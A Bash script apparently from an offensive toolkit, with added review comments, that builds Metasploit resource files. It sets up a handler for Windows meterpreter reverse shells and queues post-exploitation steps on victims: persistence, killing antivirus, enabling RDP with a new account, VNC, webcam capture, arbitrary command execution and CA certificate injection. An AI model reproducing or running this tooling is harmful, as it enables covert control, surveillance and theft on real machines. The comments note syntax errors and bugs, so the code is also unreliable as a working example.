Multi PowerShell
#!/bin/bash
######Color##########
# ANSI colour strings intended for `echo -e`. Only `red` and `RESET` are
# referenced in this file as shown (in autoscript's closing message).
# NOTE(review): `\043` is the octal code for `#`, not ESC (`\033`), so
# `okegreen` and `RESET` print a literal "#[..m" instead of changing
# terminal attributes.
cyan='\e[0;46m'
green='\e[0;44m'
okegreen='\043[92m'
lightgreen='\e[1;42m'
white='\e[1;47m'
red='\e[1;41m'
yellow='\e[0;43m'
BlueF='\e[1;44m' #blue
RESET="\043[00m" #normal
orange='\e[48;5;166m'
#######################
# All paths are resolved against the directory the script is started from
# (`pwd`), not against the script's own location.
path=`pwd`
# Plain-text resource files generated by this script: $rcf is handed to
# `msfconsole -r` at the end of the file; $rcs is referenced from $rcf through
# the AutoRunScript line written in set_handler.
rcf=$path/script-listerning.rc
rcs=$path/auto-script.rc
# Compared against the operator's input at the end of the `o)` branch in `windows`.
payload_available="windows/meterpreter/reverse_tcp"
# NOTE(review): these files are sourced unquoted and relative to the caller's
# working directory, so whatever `config` / `../configLanguage` exist there is
# executed as shell code with the script's privileges, and a working directory
# containing whitespace splits the path into several words.
source $path/config
source $path/../configLanguage
######################
#language
# `language` is not assigned in this file; presumably one of the files sourced
# above sets it — confirm. Only "VN" and "EN" are handled; for any other value
# nothing is sourced here, so the message variables and the table helpers used
# further down ($choose_answer, $error1, migrate_table, table, ...) would have
# to come from somewhere else — they are not defined in this file.
if [ "$language" = "VN" ]; then
source $path/../../language/VietNamese/VN
source $path/../../language/VietNamese/vn_table
elif [ "$language" = "EN" ]; then
source $path/../../language/English/EN
source $path/../../language/English/en_table
fi
######### Functions #########
# windows: interactive front end that (re)creates the two resource files and
# writes the handler preamble into $rcf.
# Globals:   rcf, rcs (written), payload_available, choose_answer (read)
# Arguments: none; all input is read from stdin
# Outputs:   menu text on stdout; lines appended to $rcf
#
# NOTE(review): the file does not parse as shown. The `if` at the end of the
# `o)` branch has no `then`/`fi` before the closing `esac`, so bash reports a
# syntax error while reading this definition.
function windows {
# NOTE(review): $rcf / $rcs are expanded unquoted in `rm -rf`; if the working
# directory contains whitespace the path is word-split and `rm -rf` is applied
# to each fragment.
rm -rf $rcf
touch $rcf
rm -rf $rcs
touch $rcs
sleep 1
# `>` truncates, so $rcf always starts with this line.
echo "use exploit/multi/handler" > $rcf
echo "1/ windows/meterpreter/reverse_tcp"
echo "2/ windows/meterpreter/reverse_http"
echo "o/ other"
while true; do
echo -ne "$choose_answer"
read choose
case $choose in
# Both numbered arms append the same `reverse_http` line, although the menu
# printed above labels entry 1 as `reverse_tcp`.
1)
echo "set PAYLOAD windows/meterpreter/reverse_http" >> $rcf
set_handler;;
2)
echo "set PAYLOAD windows/meterpreter/reverse_http" >> $rcf
set_handler;;
o)
guide
# Sub-prompt: the arms for check/search/show/use are empty, so the commands
# advertised by `guide` do nothing here; only `exit` leaves the loop.
while true; do
echo -ne "death-note > "
read value
case $value in
check);;
search);;
show);;
use);;
exit) break;;
esac
done
echo -ne ""
read payload
# Unterminated `if` (see the note at the top of the function).
if [ "$payload" == "$payload_available" ]
esac
done
}
# set_handler: prompts for the listener address and port and appends the
# corresponding `set` lines, plus the final `exploit -j -z`, to $rcf.
# Globals:   rcf (appended to), rcs (read), message3, message5, StartMulti,
#            error1 (read; not defined in this file)
# Arguments: none; all input is read from stdin
#
# NOTE(review): the `fi` just before the closing brace has no matching `if`,
# so bash rejects this definition as shown.
function set_handler {
echo -ne "set lhost :"
read LhOsT
echo -ne "set lport :"
read LpOrT
echo -ne " $message3"
# The values are written exactly as typed: there is no check that LHOST is an
# address or that LPORT is a number, and `read` without -r also interprets
# backslashes in the input.
echo "set LHOST $LhOsT" >> $rcf
echo "set LPORT $LpOrT" >> $rcf
echo "set ExitOnSession false" >> $rcf
echo -ne " $message5"
read a
# The loop condition is always true (no value differs from neither "yes" nor
# "no"), so the loop is left only through the `break` statements below.
while [ "$a" != "yes" ] || [ "$a" != "no" ]; do
if [ "$a" = "yes" ]; then
# autoscript fills $rcs interactively; the line below points the handler at it.
autoscript
echo "set AutoRunScript multi_console_command -r $rcs" >> $rcf
break
elif [ "$a" = "no" ]; then
echo "$StartMulti"
break
fi
echo -e "$error1";
read a
done
echo "exploit -j -z" >> $rcf
fi
}
# guide: prints the (Vietnamese) usage text for the "other payload" sub-prompt.
# Arguments: none
# Outputs:   the here-document below on stdout, unchanged
#
# English rendering of the text, for readers of the source only:
#   Usage:
#     check    : check whether this payload is in the list
#     search   : search for a payload by keyword
#     show     : print all payloads for an operating system or a programming language
#     show all : print every payload in the list
#     use      : use the payload
#     exit     : quit
#   followed by one example line for check, search, show and use.
# The text is printed regardless of the `language` setting; it is not taken
# from the sourced language files.
function guide {
cat << !
Cách dùng :
check : Kiểm tra có Payload này trong danh sách không
search : Tìm kiếm Payload theo từ khóa
show : In ra tất cả các Payload theo HĐH hoặc theo ngôn ngữ lập trình
show all : In ra tất cả các Payload trong danh sách
use : Sử dụng Payload
exit : Thoát
Ví dụ :
check windows/meterpreter/reverse_http
search reverse_http
show python
use windows/meterpreter/reverse_http
!
}
# autoscript: menu loop that appends one or more `run ...` lines to $rcs for
# each entry the operator picks; entry 99 ends the loop.
# Globals:   rcs (appended to); prompt strings such as choose_answer, error1,
#            ask_choose_script, Newport, use, pass (read; not defined in this file)
# Arguments: none; all input is read from stdin
# Outputs:   prompts and "=====> OK <=====" confirmations on stdout
#
# Nothing is executed here: the function only writes text. The resulting $rcs
# is a plain-text record of what was queued, in the directory the script was
# started from. `table` and `migrate_table` are not defined in this file;
# presumably they come from the sourced *_table language files — confirm.
# No input is validated, and every value is written to $rcs exactly as typed.
function autoscript {
##=== MIGRATE ==##
# migrate: nested helper (defined each time autoscript runs) for menu entry 2.
# Entries a and b append a fixed module line; entry c asks for two process
# names, defaulting to svchost.exe and explorer.exe when the answer is "no".
function migrate {
migrate_table
while true; do
echo -ne "$choose_answer"
read answer
case $answer in
a)
echo "run post/windows/manage/migrate" >> $rcs
echo -e "=====> OK <=====";
break;;
b)
echo "run post/windows/manage/archmigrate" >> $rcs
echo -e "=====> OK <=====";
break;;
c) echo -en "$question_aname"
while true; do
read yn
case $yn in
y|Y|Yes|yes|YES) echo -e "$import_aname"
read aname; break;;
n|N|No|no|NO) aname="svchost.exe" ; break ;;
*) echo -e "$error1";
esac
done
echo -en "$question_name"
while true; do
read yn
case $yn in
y|Y|Yes|yes|YES) echo -e "$import_name"
read name; break;;
n|N|No|no|NO) name="explorer.exe" ; break ;;
*) echo -e "$error1";
esac
done
echo "run post/windows/manage/priv_migrate ANAME=$aname NAME=$name nofail=true" >> $rcs
echo -e "=====> OK <=====";
break;;
*) echo -e "$error1";
esac
done
}
######################### Auto script ###########################################################
echo -e "$ask_choose_script"
table
while true; do
echo -ne "***"
read choose_script
case $choose_script in
1)
echo -ne "$Newport"
read newLPORT
echo "run exploits/windows/local/persistence LPORT=$newLPORT" >> $rcs
echo -e "=====> OK <=====";;
2) migrate;;
3)
echo "run killav" >> $rcs
echo -e "=====> OK <=====";;
# NOTE(review): the user name and password typed here are stored in clear
# text in $rcs, which is created with default permissions by `touch` in
# `windows` and is not removed by this script.
4) echo -ne "$use"
read Username
echo -ne "$pass"
read Password
echo "run getgui -e" >> $rcs
echo "run getgui -u $Username -p $Password" >> $rcs
echo -e "=====> OK <=====";;
# The same line is appended twice.
5)
echo "run vnc" >> $rcs
echo "run vnc" >> $rcs
echo -e "=====> OK <=====";;
6)
echo "run post/windows/gather/checkvm" >> $rcs
echo -e "=====> OK <=====";;
7)
echo -ne "$Path_wallpaper"
read path_wallpaper
echo "run post/multi/manage/set_wallpaper WALLPAPER_FILE=$path_wallpaper" >> $rcs
echo -e "=====> OK <=====";;
# No prompt is printed before this read.
8) read auto_command
echo "run post/multi/general/execute COMMAND=$auto_command" >> $rcs
echo -e "=====> OK <=====";;
9)
echo -ne "$input_path_lfile"
read path_lfile
echo -ne "$input_path_rfile"
read path_rfile
echo -ne "$input_proxy"
read proxy
echo -ne "$input_port"
read port
if [ "$path_rfile" = "" ]; then
echo "run post/multi/manage/upload_injectCA LFILE=$path_lfile ProxyServer=$proxy ProxyPort=$port" >> $rcs
else
# NOTE(review): `$rfile` is not assigned anywhere in this file as shown; the
# value read above is stored in `path_rfile`.
echo "run post/multi/manage/upload_injectCA LFILE=$path_lfile RFILE=$rfile ProxyServer=$proxy ProxyPort=$port" >> $rcs
fi
echo -e "=====> OK <=====";;
10)
echo "run post/multi/gather/env" >> $rcs
echo -e "=====> OK <=====";;
11)
echo "run post/windows/gather/enum_tokens" >> $rcs
echo -e "=====> OK <=====";;
12)
echo "run post/windows/gather/enum_shares" >> $rcs
echo -e "=====> OK <=====";;
13)
echo "run post/windows/gather/enum_applications" >> $rcs
echo -e "=====> OK <=====";;
14)
echo "run post/windows/gather/enum_powershell_env" >> $rcs
echo -e "=====> OK <=====";;
15)
echo "run post/multi/recon/local_exploit_suggester" >> $rcs
echo -e "=====> OK <=====";;
16)
echo "run post/multi/gather/wlan_geolocate" >> $rcs
echo -e "=====> OK <=====";;
17)
echo -ne "$Path_youtube"
read path_youtube
echo "run post/multi/manage/play_youtube VID=$path_youtube" >> $rcs
echo -e "=====> OK <=====";;
18)
echo -ne "$Quality"
read QuaLiTy
echo "run post/windows/manage/webcam QUALITY=$QuaLiTy" >> $rcs
echo -e "=====> OK <=====";;
99)
break;;
*) echo -e "$error1";
esac
done
echo -e "[$red*$RESET] Stating Listerning with metasploit"
}
# Entry point: start the database service, run the interactive builder, then
# hand the generated resource file to msfconsole.
# NOTE(review): as shown, bash should stop at the syntax error inside `windows`
# before it reaches these lines — confirm against the file in the repository.
# `service postgresql start` presumably needs root; its exit status is not checked.
service postgresql start
resize -s 40 105 > /dev/null
windows
# The result of `cd` is not checked. $rcf was built from `pwd` at start-up, so
# it still refers to the original directory after the change.
cd ../../Victim/
#xterm -fa monaco -fs 13 -bg black -e msfconsole -r $rcf
msfconsole -r $rcf